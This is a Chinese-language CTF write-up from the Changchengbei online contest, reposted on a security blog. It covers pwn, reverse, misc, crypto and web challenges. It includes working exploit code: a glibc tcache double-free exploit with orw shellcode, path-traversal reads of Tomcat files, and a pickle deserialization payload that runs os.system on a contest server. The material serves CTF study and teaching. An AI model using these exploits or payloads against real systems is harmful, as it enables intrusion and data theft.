长城杯线上赛WP(长城杯ctf)

03314

注:本文为goodcat战队参赛wp,非官方出品

Pwn

1、K1ng_in_h3Ap_II

libc2.27-0ubuntu1.4,存在明显的UAF;

tcahce double free 控制tcache struct,将counts[]数组全部填满后, 将其释放到unsortedbin可泄露libc;

之后再次double free 将free_hook改为setcontext,布置好orw,之后读出flag。

from pwn import*context.log_level = "debug"context.os = "linux"context.arch = "amd64"context.terminal = ['tmux', 'splitw', '-h']#r = process("./pwn2")r = remote("47.104.175.110", 61608)libc = ELF("./libc.so.6")def allocate(index, size):    r.sendlineafter(">> \n", "1")    r.sendlineafter("input index:\n", str(index))    r.sendlineafter("input size:\n", str(size))def delete(index):    r.sendlineafter(">> \n", "2")    r.sendlineafter("input index:\n", str(index))def edit(index, content):    r.sendlineafter(">> \n", "3")    r.sendlineafter("input index:\n", str(index))    r.sendafter("input context:\n", content)def show(index):    r.sendlineafter(">> \n", "4")    r.sendlineafter("input index:\n", str(index))for i in range(8):    allocate(0, 0x10)allocate(0, 0x40)for i in range(7):    allocate(0, 0x60)allocate(0, 0x60)delete(0)edit(0, 'a' * 0x10)delete(0)show(0)heap_addr = u64(r.recv(6) + '\x00\x00') & 0xfffffffffffff000print "heap_addr = " + hex(heap_addr)edit(0, p64(heap_addr+0x10))allocate(0, 0x60)allocate(0, 0x60)edit(0, 'a' * 64)delete(0)show(0)malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)libc_base = malloc_hook - libc.sym['__malloc_hook']free_hook = libc_base + libc.sym["__free_hook"]set_context = libc_base + libc.symbols['setcontext']mprotect = libc_base + libc.sym['mprotect']print "libc_base = " + hex(libc_base)print "mprotect = " + hex(mprotect)allocate(0, 0x58)edit(0, '\x00' * 0x58)allocate(1, 0x38)delete(1)edit(1, p64(free_hook))allocate(1, 0x38)allocate(1, 0x38)allocate(2, 0x30)allocate(2, 0x30)allocate(2, 0x30)allocate(2, 0x30)allocate(3, 0x10)allocate(4, 0x30)allocate(5, 0x30)new_addr =  free_hook &0xFFFFFFFFFFFFF000shellcode1 = '''xor rdi,rdimov rsi,%dmov edx,0x1000mov eax,0syscalljmp rsi''' % new_addredit(1, p64(set_context+53) + p64(free_hook+0x10) + asm(shellcode1))edit(4, p64(0) + p64(new_addr) + p64(0x1000) + p64(0) + p64(0) + p64(7))edit(5, p64(free_hook + 0x8) + p64(mprotect))delete(2)sleep(0.5)shellcode2 = '''mov rax, 0x67616c662f ;// /flagpush raxmov rdi, rsp ;// /flagmov rsi, 0 ;// O_RDONLYxor rdx, rdx ;mov rax, 2 ;// SYS_opensyscallmov rdi, rax ;// fd mov rsi,rsp  ;mov rdx, 1024 ;// nbytesmov rax,0 ;// SYS_readsyscallmov rdi, 1 ;// fd mov rsi, rsp ;// bufmov rdx, rax ;// count mov rax, 1 ;// SYS_writesyscallmov rdi, 0 ;// error_codemov rax, 60syscall'''r.sendline(asm(shellcode2))r.interactive()

1、Just_cmp-re|Solved| working:

find the cmp str.

buu原题

hook原文

图片[1]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

将原文转成qword

图片[2]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

与加密key相加得到flag

flag{a14a424005b14e2b89ed45031ea791b9}

2、Funny_js

根据题目名称,发现是一道js框架的题目

0x02, 0x1B, 0x06, 0x72, 0x63, 0x34, 0x04, 0x73, 0x6E, 0x02, 0x69, 0x02, 0x6A, 0x02, 0x6B, 0x02, 0x6C, 0x02, 0x6D, 0x02, 0x6E, 0x04, 0x75, 0x6E, 0x06, 0x61, 0x72, 0x72, 0x0C, 0x63, 0x69, 0x70, 0x68, 0x65, 0x72, 0x2A, 0x32, 0x30, 0x32, 0x31, 0x71, 0x75, 0x69, 0x63, 0x6B, 0x6A, 0x73, 0x5F, 0x68, 0x61, 0x70, 0x70, 0x79, 0x67, 0x61, 0x6D, 0x65, 0x48, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x02, 0x73, 0x18, 0x66, 0x72, 0x6F, 0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x0A, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x12, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x2E, 0x6A, 0x73, 0x08, 0x64, 0x61, 0x74, 0x61, 0x06, 0x6B, 0x65, 0x79, 0x06, 0x62, 0x6F, 0x78, 0x02, 0x78, 0x08, 0x74, 0x65, 0x6D, 0x70, 0x02, 0x79, 0x06, 0x6F, 0x75, 0x74, 0x08, 0x63, 0x6F, 0x64, 0x65, 0x14, 0x63, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x41, 0x74, 0x08, 0x70, 0x75, 0x73, 0x68, 0x0E, 0x00, 0x06, 0x00, 0x9E, 0x01, 0x00, 0x01, 0x00, 0x20, 0x00, 0x08, 0xEB, 0x04, 0x01, 0xA0, 0x01, 0x00, 0x00, 0x00, 0x40, 0xDF, 0x00, 0x00, 0x00, 0x40, 0x40, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x41, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE6, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x04, 0xEA, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE7, 0x00, 0x00, 0x00, 0x0E, 0x04, 0xEB, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE0, 0x00, 0x00, 0x00, 0xCB, 0xC0, 0x96, 0x00, 0xC0, 0xE0, 0x00, 0xC0, 0xF4, 0x00, 0xBF, 0x44, 0xBF, 0x3D, 0xBF, 0x7D, 0xBF, 0x08, 0xC0, 0xEF, 0x00, 0xC0, 0xCB, 0x00, 0xC0, 0xFE, 0x00, 0xC0, 0xF1, 0x00, 0xBF, 0x71, 0xC0, 0xD5, 0x00, 0xC0, 0xB0, 0x00, 0xBF, 0x40, 0xBF, 0x6A, 0xBF, 0x67, 0xC0, 0xA6, 0x00, 0xC0, 0xB9, 0x00, 0xC0, 0x9F, 0x00, 0xC0, 0x9E, 0x00, 0xC0, 0xAC, 0x00, 0xBF, 0x09, 0xC0, 0xD5, 0x00, 0xC0, 0xEF, 0x00, 0xBF, 0x0C, 0xBF, 0x64, 0xC0, 0xB9, 0x00, 0xBF, 0x5A, 0xC0, 0xAE, 0x00, 0xBF, 0x6B, 0xC0, 0x83, 0x00, 0x26, 0x20, 0x00, 0xC0, 0xDF, 0x00, 0x4D, 0x20, 0x00, 0x00, 0x80, 0xBF, 0x7A, 0x4D, 0x21, 0x00, 0x00, 0x80, 0xC0, 0xE5, 0x00, 0x4D, 0x22, 0x00, 0x00, 0x80, 0xC0, 0x9D, 0x00, 0x4D, 0x23, 0x00, 0x00, 0x80, 0x11, 0x3A, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0xC1, 0x01, 0x11, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xC1, 0x02, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xDF, 0x00, 0x00, 0x00, 0x39, 0xE0, 0x00, 0x00, 0x00, 0x39, 0xE7, 0x00, 0x00, 0x00, 0xF2, 0x11, 0x3A, 0xE9, 0x00, 0x00, 0x00, 0x0E, 0x06, 0xCB, 0xB7, 0x11, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xA5, 0xEC, 0x6E, 0x39, 0xE9, 0x00, 0x00, 0x00, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x48, 0x11, 0x3A, 0xE2, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE2, 0x00, 0x00, 0x00, 0xBF, 0x38, 0xBF, 0x11, 0xA0, 0xB0, 0x11, 0x3A, 0xE4, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE4, 0x00, 0x00, 0x00, 0x39, 0xE8, 0x00, 0x00, 0x00, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x48, 0xAB, 0xEC, 0x0F, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0D, 0x39, 0xE6, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE3, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE1, 0x00, 0x00, 0x00, 0x0E, 0xEE, 0x86, 0x06, 0xCB, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xAB, 0xEC, 0x15, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xB7, 0xAB, 0xEC, 0x0C, 0xC1, 0x03, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0A, 0xC1, 0x04, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xC3, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x05, 0xA7, 0xEC, 0x3A, 0x39, 0xEC, 0x00, 0x00, 0x00, 0x39, 0x97, 0x00, 0x00, 0x00, 0x43, 0xED, 0x00, 0x00, 0x00, 0x39, 0x96, 0x00, 0x00, 0x00, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x06, 0x9E, 0xF1, 0x24, 0x01, 0x00, 0x9F, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x07, 0x9D, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0xBE, 0x39, 0xEE, 0x00, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, 0x00, 0xF1, 0xCF, 0x28, 0xDE, 0x03, 0x01, 0x20, 0x00, 0x48, 0x01, 0x00, 0x4A, 0x52, 0x3F, 0x40, 0x00, 0x7C, 0x04, 0x30, 0x30, 0x2B, 0x2B, 0x77, 0x7B, 0x5D, 0x5D, 0x6C, 0x3F, 0x0E, 0x40, 0x3F, 0x4A, 0xB7, 0x30, 0x2B, 0x3F, 0xCB, 0x4E, 0x0D, 0x0E, 0x43, 0x06, 0x00, 0xBE, 0x03, 0x02, 0x08, 0x02, 0x05, 0x00, 0x00, 0xBB, 0x01, 0x0A, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00, 0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xC2, 0x03, 0x00, 0x01, 0x00, 0xE6, 0x03, 0x00, 0x02, 0x00, 0xE8, 0x03, 0x00, 0x03, 0x00, 0xEA, 0x03, 0x00, 0x04, 0x00, 0xEC, 0x03, 0x00, 0x05, 0x00, 0xEE, 0x03, 0x00, 0x06, 0x00, 0xC6, 0x03, 0x00, 0x07, 0x00, 0x39, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x01, 0xF1, 0xCB, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x09, 0xC7, 0xC8, 0xC8, 0x4A, 0x95, 0x01, 0xEE, 0xF2, 0xB7, 0xCD, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x2C, 0xC9, 0xC7, 0xC8, 0x48, 0x9F, 0xD4, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0xD4, 0xEB, 0x9E, 0x24, 0x01, 0x00, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC7, 0xC8, 0x48, 0xCE, 0xC7, 0xC8, 0x72, 0xC7, 0xC9, 0x48, 0x4A, 0xC7, 0xC9, 0xCA, 0x4A, 0x95, 0x01, 0xEE, 0xCF, 0xB7, 0xCD, 0xB7, 0xC5, 0x04, 0x26, 0x00, 0x00, 0xC5, 0x05, 0xB7, 0xCC, 0xC8, 0xD3, 0xEB, 0xA5, 0xEC, 0x56, 0xD3, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0x24, 0x01, 0x00, 0xC5, 0x06, 0xC9, 0xB8, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xCD, 0xC4, 0x04, 0xC7, 0xC9, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x04, 0xC7, 0xC9, 0x48, 0xCE, 0xC7, 0xC9, 0x72, 0xC7, 0xC4, 0x04, 0x48, 0x4A, 0xC7, 0xC4, 0x04, 0xCA, 0x4A, 0xC7, 0xC9, 0x48, 0xC7, 0xC4, 0x04, 0x48, 0x9F, 0xC0, 0x00, 0x01, 0x9E, 0xC5, 0x07, 0xC4, 0x05, 0x43, 0xF9, 0x00, 0x00, 0x00, 0xC4, 0x06, 0xC7, 0xC4, 0x07, 0x48, 0xB0, 0x24, 0x01, 0x00, 0x0E, 0x95, 0x01, 0xEE, 0xA6, 0xC4, 0x05, 0x28, 0xDE, 0x03, 0x03, 0x19, 0x04, 0x35, 0x30, 0x17, 0x18, 0x0D, 0x30, 0x7B, 0x17, 0x26, 0x17, 0x19, 0x0D, 0x12, 0x1C, 0x2C, 0x40, 0x2B, 0x3F, 0x17, 0x2B, 0x1D, 0x4A, 0x5D, 0x17, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0xE8, 0x01, 0x07, 0x44, 0xB8, 0x90, 0xB5, 0x6B, 0x67, 0x80, 0x0A, 0xE8, 0x01, 0x07, 0x34, 0xA7, 0xB8, 0x48, 0x7F, 0x8D, 0xAF, 0x0A, 0x00, 0x0A, 0x28, 0x01, 0xFE, 0x0A, 0x28, 0x01, 0xFE, 0x00, 0x00, 0x00

参考了这一篇博客

https://bbs.pediy.com/thread-259014.htm

对 quickjs.c 进行 patch:

得到字节码如下,对dump出来的字节码进行分析,提取出密文

[150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 6

4, 106, 103, 166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 1

07, 131, 223, 122, 229, 157]

再提取出加密过程如下:

RC4_KEY="2021quickjs_happygame" push_i16 150 push_i16 224 push_i16 244 push_i8 68 push_i8 61 push_i8 125 push_i8 8 push_i16 239 push_i16 203 push_i16 254 push_i16 241 push_i8 113 push_i16 213 push_i16 176 push_i8 64 push_i8 106 push_i8 103push_i16 166 push_i16 185 push_i16 159 push_i16 158 push_i16 172 push_i8 9 push_i16 213 push_i16 239 push_i8 12 push_i8 100 push_i16 185 push_i8 90 push_i16 174 push_i8 107 push_i16 131 array_from 32 push_i16 223 define_field "32" push_i8 122 define_field "33" push_i16 229 define_field "34" push_i16 157 43 define_field "35"

解密得到flag为flag{2021_9u1ck_1s_v3r7_1nT3r3st1n9}

Misc

1、你这flag保熟吗

binwalk提取两张图片,分别得到一个字母数字混合的表格和一个hint.txt

图片[3]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

password.xls

图片[4]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

hint.txt

希尔伯格曲线 取出表格中的字符,单独放到password.txt的文件中,运行脚本如下:

import base64from hilbertcurve.hilbertcurve import HilbertCurvearray = []password = ''p = 8;n=2hilbert_curve = HilbertCurve(p, n)with open('password.txt','r',encoding='utf-16') as file:    # a = file.readline().replace("\t", "").replace("\n", "")    # print(a)    for i in range(256):        a = file.readline().replace("\t", "").replace("\n", "")        array.append(a)for i in range(256*256):    [m,n] = hilbert_curve.point_from_distance(i)    password += array[n][m]# print(password)import base64temp = passwordfor i in range(25):    temp = base64.b64decode(temp)print(temp)

得到base64加密后的密文如下:

图片[5]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

base解密得到密码

图片[6]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

解压后发现里面是brainfuck

      >+++++++++[<+++++++++++++   >-]>+                                               ++[<                         +++++++++++++++++++++++++++++
      ++++++++>-]>++[<+++++++++   +++++                                              ++++++                        +++++++++++++++++++++++++++++
      ++++++++++++>-]>++++[<+++   +++++                                             ++++++++                       +++++++++++++>-]>+++[<+++++++
      +++++                       +++++                                            ++++  ++++                      +++++
      +++++                       +++++                                           +>-]    ++++                     +++++
      +++++                       +++++                                          ++++      ++++                    +++++
      +++++                       +++++                                         ++++        ++++                   +++++
      +++++                       +++++                                        ++++          ++++                  +++++
      +++++                       >>+++                                       +++[            <+++                 +++++
      +++++                       +++++                                      +>-]              >++[                <++++
      +++++++++++++++++++++++++   +++++                                     +++++++>-]>+++++++++++[<               +++++        ++++++>-]>++[<++
      +++++++++++++++++++++++++   +++++                                    ++++++++++++++++++++++++++              +>-]>       +++++++[<++++++++
      +++++++>-]+++++++++++++++   +++++                                   ++++++++++++++++++++++++++++             +++++       +++         +++++
      +++++                       +++++                                  ++++                      ++++            +++++                   +++++
      +++++                       +++++                                 ++++                        >>++           +++[<                   +++++
      +++++                       +++++                                ++++                          >-]>          +++++                   +++[<
      +++++                       +++++                               +>-]                            >+++         +++[<                   +++++
      +++++                       +++++                              ++>-                              ]>++        +++++                   [<+++
      +++++                       +++++                             ++>-                                ]+++       +++++                   +++++
      +++++                       +++++++++++++++++++++++++++      ++++                                  ++++      +++++++++++++++++++++++++++++
      +++++                       ++++++++++++++>>++[<+++++++     ++++                                    ++++     +++++++++++++++++++++++++++++
      +++++                       ++++++++++>-]>+++++[<++++++    ++++                                      ++++    +++++>-]>+++++++[<+++++++>-]>
++++                                                                                                                                              ++++
[<+++                                                                                                                                            +++++
+>-]>+++++[<+++++++++++++++++++>-]>++++[<+++++++++++++>-]>+++++[<+++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++++++[<
++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>+++++++[<+++++++++++++++++>-
]>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]>+++++++[<+++++++++++++++>-]>+++++++++[<+++++++++++++>-]>++++++[<+++++++++++++++++
>-]>+++[<+++++++++++>-]>+++++[<+++++++++++++++++++>-]>++++++++++[<++++++++++++>-]>++++++[<+++++++++++++++++>-]>+++++++[<+++++++++++++++>-]++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++>>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++>-]>+++++[<+++++++++++++++++++++++++>-]+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.>>+++
+++[<+++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>>+++[<+++++++++++++++++++++++++++++++++++++>-]<.>>++++++[<+++++++++++++++++++>-]<.>

解压后发现里面是brainfuck

uozt{SrRyvig_Xfiev_1H_4_ee0mwviuf!_xfiev}

放到编码器里面发现是atbash

图片[7]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

图片[8]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

对应位置修改下大小写

flag{HiIbert_Curve_1S_4_vv0nderfu!_curve}

Crypto

1、 baby_rsa

to small? leak?

https://blog.cryptohack.org/cryptoctf2020#one-line-crypto

from Crypto.Util.number import long_to_bytesfrom gmpy2 import invert, is_primefrom tqdm import tqdmprimes = []for xy in tqdm(range(500)):    for mn in range(500):        prime = xy**(mn+1) - (xy+1)**mn        if prime.bit_length() > 2048: break        if is_prime(prime):            primes.append(prime)c = 15808773921165746378224649554032774095198531782455904169552223303513940968292896814159288417499220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805904134099901826858367778386342376768508031554802249075072366710038889306268806744179086648684738023073458982906066972340414398928411147970593935244077925448732772473619783079328351522269170879807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341115227515163545709454746272514827000601853735356551495685229995637483506735448900656885365353434308639412035003119516693303377081576975540948311for i in range(len(primes)):    for j in range(i, len(primes)):        pq = primes[i]*primes[j]        if len(bin(pq)[2:]) == 2048:            try:                d = invert(0x10001, (primes[i]-1)*(primes[j]-1))                dec = long_to_bytes(pow(c, d, pq))                if b"flag{" in dec:                    print(dec)            except ValueError:                pass

已知((fac[0]+fac[1]+fac[2]) << 1) – 1的值,用其替代n。分解((fac[0]+fac[1]+fac[2]) << 1) – 1求其欧拉函数,进而求解出d和第二段。

import gmpy2from Crypto.Util.number import *def main():    _n = 39796272592331896400626784951713239526857273168732133046667572399622660330587881579319314094557011554851873068389016629085963086136116425352535902598378739    e = 0x10001    c = 40625981017250262945230548450738951725566520252163410124565622126754739693681271649127104109038164852787767296403697462475459670540845822150397639923013223102912674748402427501588018866490878394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654127691743944112075703814043622599530496100713378696761879982542679917631570451072107893348792817321652593471794974227183476732980623835483991067080345184978482191342430627490398516912714451984152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314400518151019955104989790911460357848366016263083    phi_n = (191 - 1) * (193 - 1) * (627383 - 1) * (1720754738477317127758682285465031939891059835873975157555031327070111123628789833299433549669619325160679719355338187877758311485785197492710491 - 1)    d = gmpy2.invert(e, phi_n)    m = pow(c % _n, d, _n)    print(long_to_bytes(m))if __name__ == '__main__':    main()

###

Web

1、java_url

一道Java_URL。

Tomcat/8.5.71

http://eci-2zeb5ty7ty8rr8c0v8yy.cloudeci1.ichunqiu.com/

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF//web.xml

<?xml version="1.0" encoding="UTF-8"?><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"         version="4.0">    <servlet>        <servlet-name>testurl</servlet-name>        <servlet-class>com.test2.aaa1.testURL</servlet-class>    </servlet>    <servlet-mapping>        <servlet-name>testurl</servlet-name>        <url-pattern>/testURL</url-pattern>    </servlet-mapping>        <servlet>        <servlet-name>download</servlet-name>        <servlet-class>com.test2.aaa1.download</servlet-class>    </servlet>    <servlet-mapping>        <servlet-name>download</servlet-name>        <url-pattern>/download</url-pattern>    </servlet-mapping></web-app>

读 /../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/com/test2/aaa1/testURL.class

得到class文件

import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;import java.net.URL;import javax.servlet.ServletException;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;public class testURL extends HttpServlet {    protected void doGet(HttpServletRequest arg1, HttpServletResponse arg2) throws ServletException, IOException {        this.doPost(arg1, arg2);    }    protected void doPost(HttpServletRequest arg6, HttpServletResponse arg7) throws ServletException, IOException {        String tartget_url = arg6.getParameter("url");        if(tartget_url.substring(0, tartget_url.indexOf(":")).matches("(?i)file|(?i)gopher|(?i)data")) {            arg7.getWriter().write(String.valueOf(new StringBuilder().append("false")));            return;        }        arg7.getWriter().write(String.valueOf(this.getContent(tartget_url)));    }    public StringBuilder getContent(String arg8) throws IOException {        BufferedReader in = new BufferedReader(new InputStreamReader(new URL(arg8).openConnection().getInputStream()));        StringBuilder content = new StringBuilder();        while(true) {            String inputLine = in.readLine();            if(inputLine == null) {                return content;            }            content.append(inputLine);            content.append("\n");        }        return content;    }}

图片[9]-长城杯线上赛WP(长城杯ctf)-Pikachu Hacker

2、EZ_python

樱桃猫写了自己的第一个flask网站,你能帮他看看有什么问题吗?

网刃杯的easy_web,原题

文件读取,/proc/self/cmdline

app.py

import pickleimport base64from flask import Flask, requestfrom flask import render_template,redirect,send_from_directoryimport osimport requestsimport randomfrom flask import send_fileapp = Flask(__name__)class User():    def __init__(self,name,age):        self.name = name        self.age = agedef check(s):    if b'R' in s:        return 0    return [email protected]("/")def index():    try:        user = base64.b64decode(request.cookies.get('user'))        if check(user):            user = pickle.loads(user)            username = user["username"]        else:            username = "bad,bad,hacker"    except:        username = "CTFer"    pic = '{0}.jpg'.format(random.randint(1,7))        try:        pic=request.args.get('pic')        with open(pic, 'rb') as f:            base64_data = base64.b64encode(f.read())            p = base64_data.decode()    except:        pic='{0}.jpg'.format(random.randint(1,7))        with open(pic, 'rb') as f:            base64_data = base64.b64encode(f.read())            p = base64_data.decode()    return render_template('index.html', uname=username, pic=p )if __name__ == "__main__":    app.run('0.0.0.0',port=8888)

读 /proc/self/environ 没用

MAIL=/var/mail/appUSER=appHOSTNAME=engine-1SHLVL=1PYTHON_PIP_VERSION=20.1HOME=/home/appGPG_KEY=E3FF2839C048B25C084DEBE9B26995E310250568LOGNAME=app_=/bin/suPYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/1fe530e9e3d800be94e04f6428460fc4fb94f5a9/get-pip.pyTERM=xtermPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binLANG=C.UTF-8SHELL=/bin/shPYTHON_VERSION=3.8.2PWD=/appPYTHON_GET_PIP_SHA256=ce486cddac44e99496a702aa5c06c5028414ef48fdfd5242cd2fe559b13d4348

http://www.snowywar.top/?p=2538 网刃原题 

import requestsimport pickleimport base64# e = 'ls / -a'e = 'cat /flagggggggggggggaaa's = pickle.dumps(e)# print(s)payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \    e.encode()+b' > /tmp/1.txt\nb.'response = requests.get("http://eci-2zecbk1aefg5marnfo77.cloudeci1.ichunqiu.com:8888/?pic=/tmp/1.txt",cookies=dict(    user=base64.b64encode(payload).decode()))for l in response.content.decode().split("\n"):    if "base64" in l:        l = l.split("\"")[1].split(",")[1]        print(base64.b64decode(l).decode())

flag{2e4af838-7d23-4b04-a77a-1519e8b14e8f}

本文作者:蚁景网安实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/166923.html

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全文献
# baby_rsa# EZ_python# java_url# Just_cmp-re|Solved| working# K1ng_in_h3Ap_II# pwn# wp
喜欢就支持一下吧
点赞14 分享
Pikachu的头像-Pikachu Hacker
MMD-0051-2016 – 小型ELF远程后门程序揭秘-Pikachu Hacker
MMD-0051-2016 – 小型ELF远程后门程序揭秘
MMD-0051-2016 – 小型ELF远程后门程序揭秘
15天前 53
PHP代码层防护与绕过(php绕过disable_function)-Pikachu Hacker
PHP代码层防护与绕过(php绕过disable_function)
PHP代码层防护与绕过(php绕过disable_function)
17天前 53
内网–端口转发以及端口复用(内网监控系统)-Pikachu Hacker
内网–端口转发以及端口复用(内网监控系统)
内网–端口转发以及端口复用(内网监控系统)
15天前 53
powershell各种反弹姿势以及取证(一)(powershell return)-Pikachu Hacker
powershell各种反弹姿势以及取证(一)(powershell return)
powershell各种反弹姿势以及取证(一)(powershell return)
15天前 53
内网渗透之DNS隧道技术(dns隧道免费上网)-Pikachu Hacker
内网渗透之DNS隧道技术(dns隧道免费上网)
内网渗透之DNS隧道技术(dns隧道免费上网)
15天前 52
安天发布:潜伏的象群——越过世界屋脊的攻击-Pikachu Hacker
安天发布:潜伏的象群——越过世界屋脊的攻击
安天发布:潜伏的象群——越过世界屋脊的攻击
15天前 52
相关推荐
MMD-0051-2016 – 小型ELF远程后门程序揭秘-Pikachu Hacker
